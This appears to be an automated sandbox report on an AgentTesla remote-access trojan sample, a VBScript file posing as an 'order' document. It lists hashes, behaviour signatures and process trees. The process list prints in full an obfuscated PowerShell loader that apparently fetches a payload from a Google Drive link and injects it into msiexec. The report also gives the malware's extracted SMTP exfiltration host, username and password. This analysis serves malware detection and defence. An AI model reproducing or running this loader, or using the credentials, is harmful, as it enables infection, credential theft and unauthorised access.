Analysis
-
max time kernel
296s -
max time network
215s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
-
submitted
23/04/2025, 06:25
General
-
Target
order nr. 0123 for 1.000.vbe
-
Size
28KB
-
MD5
592f0484a76de4f5edd8f9bd9d48e6c8
-
SHA1
8b72670572d4a1be6ae92ec5dbd3eec658e0ed66
-
SHA256
dfb92d282ba5ff519b2439265d3c9257bc23d7eceb05fc969eada0060cb23380
-
SHA512
47621868e8fb52cc671d819a3d7941ba39975ddd8dd92b3e2efc51b7653ece679c97d59195523919b3a661b82c83ef0a572f17b68ad7e4dbda5626ec75798874
-
SSDEEP
768:GAmGerlP5Z/JlYRhCn+CHdR0NnKem5y+QwJMOHR:HmGehPXxuRGdm/msTwJMOx
Score
10/10
Malware Config
Extracted
Credentials
Protocol: smtp- Host:
mail.isuzutanphat.com.vn - Port:
587 - Username:
[email protected] - Password:
aTLIfly8yk
Extracted
Family
agenttesla
Credentials
Protocol: smtp- Host:
mail.isuzutanphat.com.vn - Port:
587 - Username:
[email protected] - Password:
aTLIfly8yk - Email To:
[email protected]
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Agenttesla family
-
Blocklisted process makes network request 9 IoCs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Using powershell.exe command.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Suspicious behavior: EnumeratesProcesses 7 IoCs
-
Suspicious behavior: MapViewOfSection 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 45 IoCs
-
Suspicious use of WriteProcessMemory 8 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\order nr. 0123 for 1.000.vbe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\wmic.exewmic diskdrive get caption,serialnumber2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Get-Service;$Trawlets131='func';Get-History;$Trawlets131+='t';Get-History;$Trawlets131+='i';$Brandmelders=1;$Trawlets131+='on:';$Brandmelders=1;(n`i -p $Trawlets131 -n Binarium -value { param ($Fishmonger15);$buddying=2;do {$Unexcrescent+=$Fishmonger15[$buddying];$buddying+=3} until(!$Fishmonger15[$buddying])$Unexcrescent});(n`i -p $Trawlets131 -n Turbolampen -value {param ($Skoleskemaet);.($Cyathia18) ($Skoleskemaet)});ConvertTo-Html;$Cockaleekie=Binarium 'BuN KEInTTh.Oxw';$Cockaleekie+=Binarium ' rEBrbIgCA.lKoIReEG NDaT';$Sprogrigtighedssprgsmaal=Binarium 'LaM loSkz,oiLylV l Aa d/';$Onicolo=Binarium ' aT PlDescr1 e2';$Solnedgangen='av[Mon MEAkTO,. oS Se.lREnV FiTeCM e epMoO dIelNUnTR,MJ aSpnTha,og efuR.i],m:S :LaSPre DCKeUKar ISit aYUnpI.R oOcTU,ONoc noAul R=S $GaoLantaiboCMaoAlLOlo';$Sprogrigtighedssprgsmaal+=Binarium 'He5Sk. 0Ve Mo( aWCoi TnFrdSuoAnwUdsJa ReNBvTfo k1 l0Ko.In0Ma;C tWKoiKinUd6fr4,m;Sv Rax .6 C4Pe; g r PvSt:Ge1Pr3 D7lo..a0de)kl UGPeeBac ,kkooL /Kl2F 0Aa1K,0S 0 r1.o0K 1 S SeFVii ru e,ofDro Sx D/C,1Ud3Ba7Te. I0';$Uppertendom=Binarium 'PouwiSSaeFeRB.- sASaG eET,NPot';$Skildringernes=Binarium 'Foh ltBjtFap .sF.:Fo/ i/Imd,erOciS,vLoeO..Teg Po.eoLug lOmeM..Jac EoComNi/KouUdc v?Ree .xAsp eoFerBltRe= hdAao,uw noml ro NaKedJ &LeiSad o=G,1 -M B S1MiuU 5BaqD 0AfnBaF .1 Sp.oQK u Rh .0SkBSewyeC 3,o_FuX.ayIs7 aN ,R LmAm0 7Im3CelFosIle';$khulda=Binarium 'th>';$Cyathia18=Binarium ' bi e oX';$Kontormedhjlperen='Hymnists142';$Smrekanders='\Eftermlets.Trk';Turbolampen (Binarium 'Ve$DyGBlL VogaB.ma PLTi: ouCenT.D ke elHuIhegjeHNat SFHeU.olPa=.u$EpeInnUnV :JuaK.pP pLiDI,A ttKeALy+Pr$ IsM MDaR nEAcKL a TnAfDorEArr PS');Turbolampen (Binarium 'cl$HigbolGaOAbbStaCrL .: s BUSlB DMFoi SLStIBlABlRBoYQu= $Sos eK UIBil ,DLar eI,inUkgMoeOvR pNDeeExSGr. SSUbpV,lAvI et U(Sp$ AK UHbaUFiLSpDFiA,s)');Turbolampen (Binarium $Solnedgangen);$Skildringernes=$Submiliary[0];$Monkeypot=(Binarium ' $ uGFilExoC b aV LS,: rtBeR SUAcmC FKoEFuNPoS A=Sen MEStWTr-OpoTrb TJGaeFoC otE NsSyYA,sInTKoE,nm l. i$BiCLaORec KfrAJaL.uEA eD k .IRaE');Turbolampen ($Monkeypot);Turbolampen (Binarium 'B $ TGlr iu.imEsfToeSyn usFa. .H ae.oaKad.ne lrBosK [Te$EvU Bp,ep.ceForDot,pePhnStdDeobum a]Fl=Hu$BlSI pHorMioCug dr ui ogEntBeiH,gMohCreVad sA,sOmpPrr.ag IsAkm aunaNol');$Sinners133=Binarium 'seDUloElwHenG.lF o paUndS,FNoi lAre';$Systemskiftet191=Binarium 'Ca$M.T drSauTrmFofGreBlnSasPr.In$ hSsaiI n Fn eeSarBus P1B 3Si3Bl.emIB nKrvFoo.ikM eKl(Di$ eSOvkSpi Ll DdGor aiLen Sg .e NrSinVie ,sud, A$ OSReo MnScdT eSprSte Msam)';$Sonderes=$Undelightful;Turbolampen (Binarium ' n$.iG BlDiO lB GAJulGa: rtS,OGomwoE arSySLe=Di(SuTTaeT.s KTMa- MP aAOsTC,h,e $gasMooPsNMeDInETjrLiEUdsHm)');while (!$Tomers) {Turbolampen (Binarium ' B$T,g SlEnoPibReaKal,e: aC AoRguH,nMot oe orQud nie.sAdtIsi.onS g buU iAtsFrh.i=Ti$MiVUmi BdSpnFle .f Oo,irY kE l.aa ar iPlnTug ,eLyrSus') ;Turbolampen $Systemskiftet191;Turbolampen (Binarium 'In[S T h DrDeEJ.aSidTei oNicG l. Dt lh iRAtEStASod ]Sk: .:Cos L eEGoePapEm(Ul4S 0 T0 a0Un)');Turbolampen (Binarium ' M$Mbg GLDrOShbGiaCaLin:UntRaOUrmWiES,rCeSMa= V(.oTDeeR sLoTGl-I p.oa .T hPo C$Mis .oTaN.oDMye vrUnESmsJa)') ;Turbolampen (Binarium ' e$T GMeLWaObrbSkaStLVa: SF naTrlCosKuKMaS KPp IK lKol UEMit a=Kn$SaGS,L GOMeB Ia,hl.x: dfO,O nR DEDicHaLDaaT w,e+He+Au%Di$Grs DUT bHomFyI.elPrI.kaSeRInyT .chc,iOMou FnIsT') ;$Skildringernes=$Submiliary[$Falskspillet]}$Antilog=393639;$Alcali191=27761;Turbolampen (Binarium '.n$PrGJaL Do .BSpADeLP :.ap eOAuSTiTM XFrhKurTh Pi=Pa AG FERuTAn-c,c eOInNSetLae.rnFatO ,e$F,SA O .nDed EC r ,e BS');Turbolampen (Binarium 'G $Pug l,uoG bUda PlTh:neSKomB mNoe ,tM 7 F0He Fi= o B,[KaSSsyF s nt Fe lmSt.NoCFuoCrn.av oe SrA t,r]fo:B :K F SrNio RmKiBDiaChsSpe,h6ne4PeS ,tFerApi.in DgB (Be$KeP eoAcsPrtunxdrh irFr)');Turbolampen (Binarium 'Bo$IrG slStoKabPraOml,t:BoTDiJMaEUbN HE is aTMeEPiMDeafon HdgrsPraD,g ,e lRtrnPie rSDi V= F no[PeS.oyCasSkTS.eRemAb. otCuEB x TBa.SkEmeNNeCStOU,d ILgN,agSe].u:O :.ea,asPaCKoI Ai T. cgMaETaT.lsDiTUnrG i.iN gKr( e$G,SW mRem,iE .tVe7P,0Pu)');Turbolampen (Binarium 'Ko$ oG ,l Ho DbPyaSuLUd:D.s pk hr NaDoEPrDTad oE CRTi=Fa$ MT TJGlEBenAre SSFeTUneF m aStn ed s.saVeg oE RIzN,yEInsAc.stsEvuAfBAfS ATunrcriTeNA gBe( J$ aC.n StT IkilMaoDeG d,Me$.rA lRoC Aa SLLyiK.1br9,y1 e)');Turbolampen $Skraedder;"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Get-Service;$Trawlets131='func';Get-History;$Trawlets131+='t';Get-History;$Trawlets131+='i';$Brandmelders=1;$Trawlets131+='on:';$Brandmelders=1;(n`i -p $Trawlets131 -n Binarium -value { param ($Fishmonger15);$buddying=2;do {$Unexcrescent+=$Fishmonger15[$buddying];$buddying+=3} until(!$Fishmonger15[$buddying])$Unexcrescent});(n`i -p $Trawlets131 -n Turbolampen -value {param ($Skoleskemaet);.($Cyathia18) ($Skoleskemaet)});ConvertTo-Html;$Cockaleekie=Binarium 'BuN KEInTTh.Oxw';$Cockaleekie+=Binarium ' rEBrbIgCA.lKoIReEG NDaT';$Sprogrigtighedssprgsmaal=Binarium 'LaM loSkz,oiLylV l Aa d/';$Onicolo=Binarium ' aT PlDescr1 e2';$Solnedgangen='av[Mon MEAkTO,. oS Se.lREnV FiTeCM e epMoO dIelNUnTR,MJ aSpnTha,og efuR.i],m:S :LaSPre DCKeUKar ISit aYUnpI.R oOcTU,ONoc noAul R=S $GaoLantaiboCMaoAlLOlo';$Sprogrigtighedssprgsmaal+=Binarium 'He5Sk. 0Ve Mo( aWCoi TnFrdSuoAnwUdsJa ReNBvTfo k1 l0Ko.In0Ma;C tWKoiKinUd6fr4,m;Sv Rax .6 C4Pe; g r PvSt:Ge1Pr3 D7lo..a0de)kl UGPeeBac ,kkooL /Kl2F 0Aa1K,0S 0 r1.o0K 1 S SeFVii ru e,ofDro Sx D/C,1Ud3Ba7Te. I0';$Uppertendom=Binarium 'PouwiSSaeFeRB.- sASaG eET,NPot';$Skildringernes=Binarium 'Foh ltBjtFap .sF.:Fo/ i/Imd,erOciS,vLoeO..Teg Po.eoLug lOmeM..Jac EoComNi/KouUdc v?Ree .xAsp eoFerBltRe= hdAao,uw noml ro NaKedJ &LeiSad o=G,1 -M B S1MiuU 5BaqD 0AfnBaF .1 Sp.oQK u Rh .0SkBSewyeC 3,o_FuX.ayIs7 aN ,R LmAm0 7Im3CelFosIle';$khulda=Binarium 'th>';$Cyathia18=Binarium ' bi e oX';$Kontormedhjlperen='Hymnists142';$Smrekanders='\Eftermlets.Trk';Turbolampen (Binarium 'Ve$DyGBlL VogaB.ma PLTi: ouCenT.D ke elHuIhegjeHNat SFHeU.olPa=.u$EpeInnUnV :JuaK.pP pLiDI,A ttKeALy+Pr$ IsM MDaR nEAcKL a TnAfDorEArr PS');Turbolampen (Binarium 'cl$HigbolGaOAbbStaCrL .: s BUSlB DMFoi SLStIBlABlRBoYQu= $Sos eK UIBil ,DLar eI,inUkgMoeOvR pNDeeExSGr. SSUbpV,lAvI et U(Sp$ AK UHbaUFiLSpDFiA,s)');Turbolampen (Binarium $Solnedgangen);$Skildringernes=$Submiliary[0];$Monkeypot=(Binarium ' $ uGFilExoC b aV LS,: rtBeR SUAcmC FKoEFuNPoS A=Sen MEStWTr-OpoTrb TJGaeFoC otE NsSyYA,sInTKoE,nm l. i$BiCLaORec KfrAJaL.uEA eD k .IRaE');Turbolampen ($Monkeypot);Turbolampen (Binarium 'B $ TGlr iu.imEsfToeSyn usFa. .H ae.oaKad.ne lrBosK [Te$EvU Bp,ep.ceForDot,pePhnStdDeobum a]Fl=Hu$BlSI pHorMioCug dr ui ogEntBeiH,gMohCreVad sA,sOmpPrr.ag IsAkm aunaNol');$Sinners133=Binarium 'seDUloElwHenG.lF o paUndS,FNoi lAre';$Systemskiftet191=Binarium 'Ca$M.T drSauTrmFofGreBlnSasPr.In$ hSsaiI n Fn eeSarBus P1B 3Si3Bl.emIB nKrvFoo.ikM eKl(Di$ eSOvkSpi Ll DdGor aiLen Sg .e NrSinVie ,sud, A$ OSReo MnScdT eSprSte Msam)';$Sonderes=$Undelightful;Turbolampen (Binarium ' n$.iG BlDiO lB GAJulGa: rtS,OGomwoE arSySLe=Di(SuTTaeT.s KTMa- MP aAOsTC,h,e $gasMooPsNMeDInETjrLiEUdsHm)');while (!$Tomers) {Turbolampen (Binarium ' B$T,g SlEnoPibReaKal,e: aC AoRguH,nMot oe orQud nie.sAdtIsi.onS g buU iAtsFrh.i=Ti$MiVUmi BdSpnFle .f Oo,irY kE l.aa ar iPlnTug ,eLyrSus') ;Turbolampen $Systemskiftet191;Turbolampen (Binarium 'In[S T h DrDeEJ.aSidTei oNicG l. Dt lh iRAtEStASod ]Sk: .:Cos L eEGoePapEm(Ul4S 0 T0 a0Un)');Turbolampen (Binarium ' M$Mbg GLDrOShbGiaCaLin:UntRaOUrmWiES,rCeSMa= V(.oTDeeR sLoTGl-I p.oa .T hPo C$Mis .oTaN.oDMye vrUnESmsJa)') ;Turbolampen (Binarium ' e$T GMeLWaObrbSkaStLVa: SF naTrlCosKuKMaS KPp IK lKol UEMit a=Kn$SaGS,L GOMeB Ia,hl.x: dfO,O nR DEDicHaLDaaT w,e+He+Au%Di$Grs DUT bHomFyI.elPrI.kaSeRInyT .chc,iOMou FnIsT') ;$Skildringernes=$Submiliary[$Falskspillet]}$Antilog=393639;$Alcali191=27761;Turbolampen (Binarium '.n$PrGJaL Do .BSpADeLP :.ap eOAuSTiTM XFrhKurTh Pi=Pa AG FERuTAn-c,c eOInNSetLae.rnFatO ,e$F,SA O .nDed EC r ,e BS');Turbolampen (Binarium 'G $Pug l,uoG bUda PlTh:neSKomB mNoe ,tM 7 F0He Fi= o B,[KaSSsyF s nt Fe lmSt.NoCFuoCrn.av oe SrA t,r]fo:B :K F SrNio RmKiBDiaChsSpe,h6ne4PeS ,tFerApi.in DgB (Be$KeP eoAcsPrtunxdrh irFr)');Turbolampen (Binarium 'Bo$IrG slStoKabPraOml,t:BoTDiJMaEUbN HE is aTMeEPiMDeafon HdgrsPraD,g ,e lRtrnPie rSDi V= F no[PeS.oyCasSkTS.eRemAb. otCuEB x TBa.SkEmeNNeCStOU,d ILgN,agSe].u:O :.ea,asPaCKoI Ai T. cgMaETaT.lsDiTUnrG i.iN gKr( e$G,SW mRem,iE .tVe7P,0Pu)');Turbolampen (Binarium 'Ko$ oG ,l Ho DbPyaSuLUd:D.s pk hr NaDoEPrDTad oE CRTi=Fa$ MT TJGlEBenAre SSFeTUneF m aStn ed s.saVeg oE RIzN,yEInsAc.stsEvuAfBAfS ATunrcriTeNA gBe( J$ aC.n StT IkilMaoDeG d,Me$.rA lRoC Aa SLLyiK.1br9,y1 e)');Turbolampen $Skraedder;"1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"2⤵
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
Network
MITRE ATT&CK Enterprise v16
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD55da5a69ce0fb1fbafa95d75daf0d0b6f
SHA162ab3c880d8bdf4ca2807e0860676e2312350aad
SHA2568e495e915fe88fbf8fb1784a27299dae32e5b56e8bb8d1364417375dc20e6404
SHA51268b14ee3df9233b136708602205fa62b0c49507c9c55bc344ac71253ab8c6cb2e98a17f9961ffe9babc46d79d2bb6351b6e575e482e091aea8f02e01f4271577
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
548KB
MD5148643eb609aae313d15b1294c34c502
SHA10c5cda2eb8a85d7ab7e89f9df45741fb4bddc7f5
SHA2569ad4eab133957b5c0fe45073c2e82c511dd5714583cd24da48764c4e3c350564
SHA51252c830a700fc93151da5b2bb5265edef91573df433da72685273f8e48669cf929348f0b2183958ae8320903521a76afc0559c290f1ea86bd939fab0676c677b5
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
8KB
-
Filesize
10.8MB
-
Filesize
8KB
-
Filesize
136KB
-
Filesize
10.8MB
-
Filesize
136KB
-
Filesize
6.5MB
-
Filesize
408KB
-
Filesize
3.3MB
-
Filesize
6.2MB
-
Filesize
120KB
-
Filesize
304KB
-
Filesize
104KB
-
Filesize
600KB
-
Filesize
136KB
-
Filesize
5.6MB
-
Filesize
408KB
-
Filesize
216KB
-
Filesize
44.3MB
-
Filesize
18.3MB
-
Filesize
18.3MB
-
Filesize
264KB
-
Filesize
320KB
-
Filesize
624KB
-
Filesize
584KB
-
Filesize
40KB